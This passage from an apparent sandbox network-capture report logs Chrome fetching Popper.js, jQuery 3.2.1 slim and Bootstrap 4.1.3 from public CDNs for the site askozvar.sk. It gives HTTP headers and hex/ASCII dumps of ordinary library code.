                        2024-08-30 22:35:42 UTC1369INData Raw: 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72
                        Data Ascii: ({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}r
                        2024-08-30 22:35:42 UTC1369INData Raw: 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d
                        Data Ascii: ,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=
                        2024-08-30 22:35:42 UTC1369INData Raw: 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69
                        Data Ascii: nsole.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={i
                        2024-08-30 22:35:42 UTC1369INData Raw: 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b
                        Data Ascii: ),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{
                        2024-08-30 22:35:42 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29
                        Data Ascii: ;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e)
                        2024-08-30 22:35:42 UTC1369INData Raw: 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63
                        Data Ascii: {return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}func
                        2024-08-30 22:35:42 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e
                        Data Ascii: {return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=argumen


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.449745151.101.130.1374433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC568OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                        Host: code.jquery.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Origin: https://www.askozvar.sk
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC610INHTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 69597
                        Server: nginx
                        Content-Type: application/javascript; charset=utf-8
                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                        ETag: "28feccc0-10fdd"
                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        Via: 1.1 varnish, 1.1 varnish
                        Accept-Ranges: bytes
                        Age: 222168
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740040-EWR
                        X-Cache: HIT, HIT
                        X-Cache-Hits: 42, 0
                        X-Timer: S1725057342.233316,VS0,VE1
                        Vary: Accept-Encoding
                        2024-08-30 22:35:42 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                        Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                        2024-08-30 22:35:42 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                        Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                        2024-08-30 22:35:42 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                        Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                        2024-08-30 22:35:42 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                        Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                        2024-08-30 22:35:42 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                        Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                        2024-08-30 22:35:42 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                        Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                        2024-08-30 22:35:42 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                        Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                        2024-08-30 22:35:42 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                        Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                        2024-08-30 22:35:42 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                        Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                        2024-08-30 22:35:42 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                        Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.449747104.18.11.2074433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC560OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                        Host: stackpath.bootstrapcdn.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC948INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        CDN-PullZone: 252412
                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                        CDN-RequestCountryCode: DE
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=31919000
                        ETag: W/"67176c242e1bdc20603c878dee836df3"
                        Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                        CDN-CachedAt: 10/31/2023 18:58:40
                        CDN-ProxyVer: 1.04
                        CDN-RequestPullCode: 200
                        CDN-RequestPullSuccess: True
                        CDN-EdgeStorageId: 1048
                        timing-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        X-Content-Type-Options: nosniff
                        CDN-Status: 200
                        CDN-RequestId: f4f838df79fc133911a060d7c6bb0f5c
                        CDN-Cache: HIT
                        CF-Cache-Status: HIT
                        Age: 14699671
